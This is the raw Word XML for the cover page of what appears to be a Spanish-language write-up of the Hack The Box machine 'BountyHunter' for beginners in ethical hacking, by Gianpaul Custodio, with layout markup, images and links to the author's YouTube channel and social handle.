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D80A" w14:textId="08587C83" w:rsidR="00C6799C" w:rsidRDefault="007A24E7" w:rsidP="00C6799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4D786C" wp14:editId="19BA12D8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>-1207135</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-325472</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7814510" cy="1335505"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1754941979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510" cy="133550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2ECCA" w14:textId="30C40078" w:rsidR="00A95022" w:rsidRPr="00A95022" w:rsidRDefault="00A95022" w:rsidP="00A95022">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Sans Serif Shaded" w:hAnsi="Sans Serif Shaded" w:cs="Times Sans Serif"/>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="120"/>
                                <w:szCs w:val="120"/>
                                <w:lang w:val="es-ES"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="004D731F">
                              <w:rPr>
                                <w:rFonts w:ascii="Sans Serif Shaded" w:hAnsi="Sans Serif Shaded" w:cs="Times Sans Serif"/>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="120"/>
                                <w:szCs w:val="120"/>
                                <w:lang w:val="es-ES"/>
                              </w:rPr>
                              <w:t>BountyH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D786C" id="Rectángulo: esquinas redondeadas 5" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:-95.05pt;margin-top:-25.65pt;width:615.3pt;height:105.1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" filled="f" stroked="f" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6502ECCA" w14:textId="30C40078" w:rsidR="00A95022" w:rsidRPr="00A95022" w:rsidRDefault="00A95022" w:rsidP="00A95022">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Sans Serif Shaded" w:hAnsi="Sans Serif Shaded" w:cs="Times Sans Serif"/>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          <w:sz w:val="120"/>
                          <w:szCs w:val="120"/>
                          <w:lang w:val="es-ES"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="004D731F">
                        <w:rPr>
                          <w:rFonts w:ascii="Sans Serif Shaded" w:hAnsi="Sans Serif Shaded" w:cs="Times Sans Serif"/>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          <w:sz w:val="120"/>
                          <w:szCs w:val="120"/>
                          <w:lang w:val="es-ES"/>
                        </w:rPr>
                        <w:t>BountyHun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7425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6061F42" wp14:editId="62C6ECB4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:align>right</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-322782</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7537784" cy="5680953"/>
                <wp:effectExtent l="0" t="0" r="25400" b="3749040"/>
                <wp:wrapNone/>
                <wp:docPr id="717281927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784" cy="5680953"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="111927"/>
                        </a:solidFill>
                        <a:effectLst>
                          <a:reflection stA="42000" endPos="650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7C5B6" w14:textId="0C6B4954" w:rsidR="007A24E7" w:rsidRPr="0058283C" w:rsidRDefault="007A24E7" w:rsidP="007A24E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BE13EE" wp14:editId="3C2D0203">
                                  <wp:extent cx="5752214" cy="3982072"/>
                                  <wp:effectExtent l="0" t="0" r="1270" b="0"/>
                                  <wp:docPr id="1237210144" name="Imagen 6" descr="Una señal de alto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7210144" name="Imagen 6" descr="Una señal de alto&#10;&#10;Descripción generada automáticamente con confianza m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169" cy="4022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61F42" id="Rectángulo 4" o:spid="_x0000_s1027" style="position:absolute;left:0;text-align:left;margin-left:542.35pt;margin-top:-25.4pt;width:593.55pt;height:447.3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" fillcolor="#111927" strokecolor="#09101d [484]" strokeweight="1pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6FC7C5B6" w14:textId="0C6B4954" w:rsidR="007A24E7" w:rsidRPr="0058283C" w:rsidRDefault="007A24E7" w:rsidP="007A24E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BE13EE" wp14:editId="3C2D0203">
                            <wp:extent cx="5752214" cy="3982072"/>
                            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
                            <wp:docPr id="1237210144" name="Imagen 6" descr="Una señal de alto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7210144" name="Imagen 6" descr="Una señal de alto&#10;&#10;Descripción generada automáticamente con confianza m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169" cy="4022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679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48AEB" wp14:editId="13DFD1E2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543800" cy="501614"/>
                <wp:effectExtent l="0" t="0" r="19050" b="13335"/>
                <wp:wrapNone/>
                <wp:docPr id="48829927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50161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8F483" w14:textId="2F429E4D" w:rsidR="00697D45" w:rsidRPr="00C6799C" w:rsidRDefault="007D5522" w:rsidP="00697D45">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Grandview" w:hAnsi="Grandview" w:cs="Sans Serif Collection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Grandview" w:hAnsi="Grandview" w:cs="Sans Serif Collection"/>
                                <w:sz w:val="48"/>
                                <w:szCs w:val="48"/>
                                <w:lang w:val="es-ES"/>
                              </w:rPr>
                              <w:t>Introducción al Hacking É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48AEB" id="Rectángulo 2" o:spid="_x0000_s1028" style="position:absolute;left:0;text-align:left;margin-left:542.8pt;margin-top:-70.85pt;width:594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" fillcolor="black [3213]" strokecolor="#09101d [484]" strokeweight="1pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1788F483" w14:textId="2F429E4D" w:rsidR="00697D45" w:rsidRPr="00C6799C" w:rsidRDefault="007D5522" w:rsidP="00697D45">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Grandview" w:hAnsi="Grandview" w:cs="Sans Serif Collection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Grandview" w:hAnsi="Grandview" w:cs="Sans Serif Collection"/>
                          <w:sz w:val="48"/>
                          <w:szCs w:val="48"/>
                          <w:lang w:val="es-ES"/>
                        </w:rPr>
                        <w:t>Introducción al Hacking Étic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452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C49A3" wp14:editId="5597070C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:align>right</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>9074150</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7543800" cy="704850"/>
                <wp:effectExtent l="0" t="0" r="19050" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="194916452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04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78B48" w14:textId="69D74929" w:rsidR="00C6799C" w:rsidRPr="00A56118" w:rsidRDefault="007A24E7" w:rsidP="00C6799C">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Selawik Semibold" w:hAnsi="Selawik Semibold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Selawik Semibold" w:hAnsi="Selawik Semibold"/>
                                <w:sz w:val="36"/>
                                <w:szCs w:val="36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B97266" wp14:editId="6C6B4231">
                                  <wp:extent cx="270934" cy="187375"/>
                                  <wp:effectExtent l="0" t="0" r="0" b="3175"/>
                                  <wp:docPr id="654267720" name="Imagen 1" descr="Una señal de alto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4267720" name="Imagen 654267720" descr="Una señal de alto&#10;&#10;Descripción generada automáticamente con confianza medi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83210" cy="195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lawik Semibold" w:hAnsi="Selawik Semibold"/>
                                <w:sz w:val="36"/>
                                <w:szCs w:val="36"/>
                                <w:lang w:val="es-ES"/>
                              </w:rPr>
                              <w:t xml:space="preserve">  </w:t>
                            </w:r>
                            <w:r w:rsidR="00C6799C" w:rsidRPr="00A56118">
                              <w:rPr>
                                <w:rFonts w:ascii="Selawik Semibold" w:hAnsi="Selawik Semibold"/>
                                <w:sz w:val="36"/>
                                <w:szCs w:val="36"/>
                                <w:lang w:val="es-ES"/>
                              </w:rPr>
                              <w:t xml:space="preserve">Para más contenido visita mi canal de </w:t>
                            </w:r>
                            <w:r w:rsidR="00A56118" w:rsidRPr="00A56118">
                              <w:rPr>
                                <w:rFonts w:ascii="Selawik Semibold" w:hAnsi="Selawik Semibold"/>
                                <w:sz w:val="36"/>
                                <w:szCs w:val="36"/>
                                <w:lang w:val="es-ES"/>
                              </w:rPr>
                              <w:t>YouTube</w:t>
                            </w:r>
                            <w:r w:rsidR="00C6799C" w:rsidRPr="00A56118">
                              <w:rPr>
                                <w:rFonts w:ascii="Selawik Semibold" w:hAnsi="Selawik Semibold"/>
                                <w:sz w:val="36"/>
                                <w:szCs w:val="36"/>
                                <w:lang w:val="es-ES"/>
                              </w:rPr>
                              <w:t>: Hacke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49A3" id="_x0000_s1029" style="position:absolute;left:0;text-align:left;margin-left:542.8pt;margin-top:714.5pt;width:594pt;height:55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" fillcolor="black [3213]" strokecolor="#09101d [484]" strokeweight="1pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="2BA78B48" w14:textId="69D74929" w:rsidR="00C6799C" w:rsidRPr="00A56118" w:rsidRDefault="007A24E7" w:rsidP="00C6799C">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Selawik Semibold" w:hAnsi="Selawik Semibold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Selawik Semibold" w:hAnsi="Selawik Semibold"/>
                          <w:sz w:val="36"/>
                          <w:szCs w:val="36"/>
                          <w:lang w:val="es-ES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B97266" wp14:editId="6C6B4231">
                            <wp:extent cx="270934" cy="187375"/>
                            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
                            <wp:docPr id="654267720" name="Imagen 1" descr="Una señal de alto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4267720" name="Imagen 654267720" descr="Una señal de alto&#10;&#10;Descripción generada automáticamente con confianza media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83210" cy="195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lawik Semibold" w:hAnsi="Selawik Semibold"/>
                          <w:sz w:val="36"/>
                          <w:szCs w:val="36"/>
                          <w:lang w:val="es-ES"/>
                        </w:rPr>
                        <w:t xml:space="preserve">  </w:t>
                      </w:r>
                      <w:r w:rsidR="00C6799C" w:rsidRPr="00A56118">
                        <w:rPr>
                          <w:rFonts w:ascii="Selawik Semibold" w:hAnsi="Selawik Semibold"/>
                          <w:sz w:val="36"/>
                          <w:szCs w:val="36"/>
                          <w:lang w:val="es-ES"/>
                        </w:rPr>
                        <w:t xml:space="preserve">Para más contenido visita mi canal de </w:t>
                      </w:r>
                      <w:r w:rsidR="00A56118" w:rsidRPr="00A56118">
                        <w:rPr>
                          <w:rFonts w:ascii="Selawik Semibold" w:hAnsi="Selawik Semibold"/>
                          <w:sz w:val="36"/>
                          <w:szCs w:val="36"/>
                          <w:lang w:val="es-ES"/>
                        </w:rPr>
                        <w:t>YouTube</w:t>
                      </w:r>
                      <w:r w:rsidR="00C6799C" w:rsidRPr="00A56118">
                        <w:rPr>
                          <w:rFonts w:ascii="Selawik Semibold" w:hAnsi="Selawik Semibold"/>
                          <w:sz w:val="36"/>
                          <w:szCs w:val="36"/>
                          <w:lang w:val="es-ES"/>
                        </w:rPr>
                        <w:t>: HackeMat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52A47AA" w14:textId="17252DBD" w:rsidR="00C6799C" w:rsidRDefault="00C6799C" w:rsidP="00C6799C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="281F5CC9" w14:textId="5F7894DF" w:rsidR="00C6799C" w:rsidRDefault="007A24E7" w:rsidP="00C6799C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00C6799C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0134DFAC" wp14:editId="49055EAF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>1072445</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>133809</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3458845" cy="3235960"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="1279733849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33849" name="Imagen 1" descr="Logotipo&#10;&#10;Descripción generada automáticamente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138" b="90000" l="9194" r="90000">
                                  <a14:foregroundMark x1="44839" y1="9138" x2="44839" y2="9138"/>
                                  <a14:foregroundMark x1="9194" y1="50000" x2="9194" y2="50000"/>
                                  <a14:foregroundMark x1="70161" y1="70517" x2="70161" y2="70517"/>
                                  <a14:foregroundMark x1="70645" y1="70517" x2="78065" y2="71897"/>
                                  <a14:foregroundMark x1="68065" y1="76379" x2="72097" y2="77759"/>
                                  <a14:foregroundMark x1="74355" y1="77759" x2="78306" y2="77759"/>
                                  <a14:foregroundMark x1="66613" y1="78621" x2="73871" y2="74483"/>
                                  <a14:foregroundMark x1="70645" y1="73966" x2="67097" y2="73966"/>
                                  <a14:foregroundMark x1="69355" y1="71379" x2="67581" y2="71379"/>
                                  <a14:foregroundMark x1="74355" y1="84310" x2="74355" y2="84310"/>
                                  <a14:foregroundMark x1="64194" y1="75345" x2="64194" y2="75345"/>
                                  <a14:foregroundMark x1="64194" y1="75345" x2="64194" y2="75345"/>
                                  <a14:foregroundMark x1="64194" y1="75345" x2="64194" y2="78448"/>
                                  <a14:foregroundMark x1="64194" y1="78448" x2="65161" y2="80345"/>
                                  <a14:foregroundMark x1="65161" y1="80345" x2="75645" y2="82241"/>
                                  <a14:foregroundMark x1="76935" y1="82241" x2="76935" y2="82241"/>
                                  <a14:foregroundMark x1="76935" y1="82241" x2="71290" y2="82931"/>
                                  <a14:foregroundMark x1="73548" y1="84310" x2="73548" y2="84310"/>
                                  <a14:foregroundMark x1="71452" y1="84310" x2="71452" y2="84310"/>
                                  <a14:backgroundMark x1="80000" y1="78103" x2="80000" y2="78103"/>
                                  <a14:backgroundMark x1="80000" y1="78103" x2="79677" y2="78621"/>
                                  <a14:backgroundMark x1="80000" y1="78103" x2="80000" y2="77241"/>
                                  <a14:backgroundMark x1="80000" y1="77241" x2="80484" y2="78621"/>
                                  <a14:backgroundMark x1="74516" y1="84483" x2="74516" y2="84483"/>
                                  <a14:backgroundMark x1="73710" y1="84483" x2="73710" y2="84483"/>
                                  <a14:backgroundMark x1="74032" y1="84483" x2="74032" y2="844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D06F7" w14:textId="50E778D0" w:rsidR="00C6799C" w:rsidRDefault="00C6799C" w:rsidP="00C6799C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="277E938A" w14:textId="6B63ABE9" w:rsidR="00C6799C" w:rsidRDefault="00C6799C" w:rsidP="00C6799C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="186B3DD1" w14:textId="677D3EC3" w:rsidR="00C6799C" w:rsidRDefault="00C6799C" w:rsidP="00C6799C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="616426D7" w14:textId="18C041F9" w:rsidR="00A56118" w:rsidRDefault="00A56118" w:rsidP="00C6799C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56697DCD" w14:textId="4092DDF7" w:rsidR="00A56118" w:rsidRDefault="00A56118" w:rsidP="00C6799C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="714FDFBA" w14:textId="1C49396C" w:rsidR="00A56118" w:rsidRDefault="00A56118" w:rsidP="00C6799C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AD85347" w14:textId="5D8400E1" w:rsidR="00A56118" w:rsidRDefault="00A56118" w:rsidP="00C6799C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68556A40" w14:textId="75B0B701" w:rsidR="00A56118" w:rsidRDefault="00A56118" w:rsidP="00C6799C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A4F087F" w14:textId="5459298A" w:rsidR="00A56118" w:rsidRDefault="00A56118" w:rsidP="00C6799C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BE59930" w14:textId="768EA104" w:rsidR="00A56118" w:rsidRDefault="00424318" w:rsidP="00C6799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E62801" wp14:editId="76D6AF11">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1772920</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>180651</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1955800" cy="295910"/>
                <wp:effectExtent l="0" t="0" r="25400" b="27940"/>
                <wp:wrapNone/>
                <wp:docPr id="559427013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95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599FC" w14:textId="3E8940C8" w:rsidR="00A95022" w:rsidRPr="00663D49" w:rsidRDefault="00A95022" w:rsidP="00A95022">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Times Sans Serif" w:hAnsi="Times Sans Serif" w:cs="Times Sans Serif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63D49">
                              <w:rPr>
                                <w:rFonts w:ascii="Times Sans Serif" w:hAnsi="Times Sans Serif" w:cs="Times Sans Serif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Hecho por: Gianpaul Custo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62801" id="_x0000_s1030" style="position:absolute;left:0;text-align:left;margin-left:139.6pt;margin-top:14.2pt;width:154pt;height:23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AD599FC" w14:textId="3E8940C8" w:rsidR="00A95022" w:rsidRPr="00663D49" w:rsidRDefault="00A95022" w:rsidP="00A95022">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Times Sans Serif" w:hAnsi="Times Sans Serif" w:cs="Times Sans Serif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663D49">
                        <w:rPr>
                          <w:rFonts w:ascii="Times Sans Serif" w:hAnsi="Times Sans Serif" w:cs="Times Sans Serif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Hecho por: Gianpaul Custodio</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:roundrect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00A56118">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2BCC8E0F" wp14:editId="3F781CF5">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2543175</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>479114</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="342900" cy="396875"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="1483702972" name="Imagen 3" descr="Hack The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k The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2" t="16125" r="19274" b="11776"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="34290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3B658A" w14:textId="1933C060" w:rsidR="00BA4552" w:rsidRDefault="00B20ED4" w:rsidP="00C6799C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>________________________________ _______________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9FE4A8" w14:textId="4015259A" w:rsidR="0051639D" w:rsidRDefault="00795925" w:rsidP="0051639D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53B6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="70AD47" w:themeColor="accent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1DED7B9" wp14:editId="0677B258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1457325" cy="638810"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="2371136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39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A3342" w14:textId="762BFFCC" w:rsidR="00B20ED4" w:rsidRPr="00795925" w:rsidRDefault="007A24E7" w:rsidP="0079592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7D5522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  <w:lang w:val="es-ES"/>
                              </w:rPr>
                              <w:t>DIFICULTAD</w:t>
                            </w:r>
                            <w:r w:rsidR="00795925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  <w:lang w:val="es-ES"/>
                              </w:rPr>
                              <w:br/>
                            </w:r>
                            <w:r w:rsidR="00B20ED4" w:rsidRPr="00795925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Ea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ED7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margin-left:0;margin-top:20.35pt;width:114.75pt;height:50.3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" filled="f" stroked="f" strokeweight="1pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="388A3342" w14:textId="762BFFCC" w:rsidR="00B20ED4" w:rsidRPr="00795925" w:rsidRDefault="007A24E7" w:rsidP="0079592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  <w:lang w:val="es-ES"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="007D5522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  <w:lang w:val="es-ES"/>
                        </w:rPr>
                        <w:t>DIFICULTAD</w:t>
                      </w:r>
                      <w:r w:rsidR="00795925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  <w:lang w:val="es-ES"/>
                        </w:rPr>
                        <w:br/>
                      </w:r>
                      <w:r w:rsidR="00B20ED4" w:rsidRPr="00795925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Eas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151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7A6385" wp14:editId="066C968C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3724910</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3753299</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2118731" cy="498831"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="119312660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731" cy="498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B84D9" w14:textId="16D1EB91" w:rsidR="002B1519" w:rsidRPr="002B1519" w:rsidRDefault="002B151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B1519">
                              <w:rPr>
                                <w:rStyle w:val="Hipervnculo"/>
                                <w:sz w:val="40"/>
                                <w:szCs w:val="40"/>
                                <w:u w:val="none"/>
                              </w:rPr>
                              <w:t>@</w:t>
                            </w:r>
                            <w:hyperlink r:id="rId13" w:history="1">
                              <w:r w:rsidRPr="002B1519">
                                <w:rPr>
                                  <w:rStyle w:val="Hipervnculo"/>
                                  <w:sz w:val="40"/>
                                  <w:szCs w:val="40"/>
                                  <w:u w:val="none"/>
                                </w:rPr>
                                <w:t>hackemateperu</w:t>
                              </w:r>
                            </w:hyperlink>
                            <w:r w:rsidRPr="002B1519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6385" id="Cuadro de texto 15" o:spid="_x0000_s1032" type="#_x0000_t202" style="position:absolute;margin-left:293.3pt;margin-top:295.55pt;width:166.85pt;height:39.3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" filled="f" stroked="f" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="4EDB84D9" w14:textId="16D1EB91" w:rsidR="002B1519" w:rsidRPr="002B1519" w:rsidRDefault="002B1519">
                      <w:pPr>
                        <w:rPr>
                          <w:sz w:val="40"/>
                          <w:szCs w:val="40"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="002B1519">
                        <w:rPr>
                          <w:rStyle w:val="Hipervnculo"/>
                          <w:sz w:val="40"/>
                          <w:szCs w:val="40"/>
                          <w:u w:val="none"/>
                        </w:rPr>
                        <w:t>@</w:t>
                      </w:r>
                      <w:hyperlink r:id="rId14" w:history="1">
                        <w:r w:rsidRPr="002B1519">
                          <w:rPr>
                            <w:rStyle w:val="Hipervnculo"/>
                            <w:sz w:val="40"/>
                            <w:szCs w:val="40"/>
                            <w:u w:val="none"/>
                          </w:rPr>
                          <w:t>hackemateperu</w:t>
                        </w:r>
                      </w:hyperlink>
                      <w:r w:rsidRPr="002B1519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171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926407" wp14:editId="66D1BF19">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3620073</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3138170</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2460703" cy="312234"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1953130054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703" cy="312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A12EE" w14:textId="62BCD10F" w:rsidR="00A91712" w:rsidRPr="00A91712" w:rsidRDefault="00000000" w:rsidP="00A91712">
                            <w:pPr>
                              <w:pStyle w:val="t-14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="00A91712">
                                <w:rPr>
                                  <w:rStyle w:val="Hipervnculo"/>
                                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                  <w:u w:val="none"/>
                                </w:rPr>
                                <w:t>G</w:t>
                              </w:r>
                              <w:r w:rsidR="00A91712" w:rsidRPr="00A91712">
                                <w:rPr>
                                  <w:rStyle w:val="Hipervnculo"/>
                                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                  <w:u w:val="none"/>
                                </w:rPr>
                                <w:t>ianpaul</w:t>
                              </w:r>
                              <w:r w:rsidR="00A91712">
                                <w:rPr>
                                  <w:rStyle w:val="Hipervnculo"/>
                                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                  <w:u w:val="none"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> C</w:t>
                              </w:r>
                              <w:r w:rsidR="00A91712" w:rsidRPr="00A91712">
                                <w:rPr>
                                  <w:rStyle w:val="Hipervnculo"/>
                                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                  <w:u w:val="none"/>
                                </w:rPr>
                                <w:t>ustodio</w:t>
                              </w:r>
                              <w:r w:rsidR="00A91712">
                                <w:rPr>
                                  <w:rStyle w:val="Hipervnculo"/>
                                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                  <w:u w:val="none"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> C</w:t>
                              </w:r>
                              <w:r w:rsidR="00A91712" w:rsidRPr="00A91712">
                                <w:rPr>
                                  <w:rStyle w:val="Hipervnculo"/>
                                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                  <w:u w:val="none"/>
                                </w:rPr>
                                <w:t>havarría</w:t>
                              </w:r>
                            </w:hyperlink>
                            <w:r w:rsidR="00A91712" w:rsidRPr="00A91712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6E31E1D" w14:textId="3C069551" w:rsidR="00A91712" w:rsidRPr="00A91712" w:rsidRDefault="00A9171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407" id="_x0000_s1033" type="#_x0000_t202" style="position:absolute;margin-left:285.05pt;margin-top:247.1pt;width:193.75pt;height:24.6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" filled="f" stroked="f" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="764A12EE" w14:textId="62BCD10F" w:rsidR="00A91712" w:rsidRPr="00A91712" w:rsidRDefault="00000000" w:rsidP="00A91712">
                      <w:pPr>
                        <w:pStyle w:val="t-14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hyperlink r:id="rId16" w:history="1">
                        <w:r w:rsidR="00A91712">
                          <w:rPr>
                            <w:rStyle w:val="Hipervnculo"/>
                            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="28"/>
                            <w:szCs w:val="28"/>
                            <w:u w:val="none"/>
                          </w:rPr>
                          <w:t>G</w:t>
                        </w:r>
                        <w:r w:rsidR="00A91712" w:rsidRPr="00A91712">
                          <w:rPr>
                            <w:rStyle w:val="Hipervnculo"/>
                            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="28"/>
                            <w:szCs w:val="28"/>
                            <w:u w:val="none"/>
                          </w:rPr>
                          <w:t>ianpaul</w:t>
                        </w:r>
                        <w:r w:rsidR="00A91712">
                          <w:rPr>
                            <w:rStyle w:val="Hipervnculo"/>
                            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="28"/>
                            <w:szCs w:val="28"/>
                            <w:u w:val="none"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> C</w:t>
                        </w:r>
                        <w:r w:rsidR="00A91712" w:rsidRPr="00A91712">
                          <w:rPr>
                            <w:rStyle w:val="Hipervnculo"/>
                            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="28"/>
                            <w:szCs w:val="28"/>
                            <w:u w:val="none"/>
                          </w:rPr>
                          <w:t>ustodio</w:t>
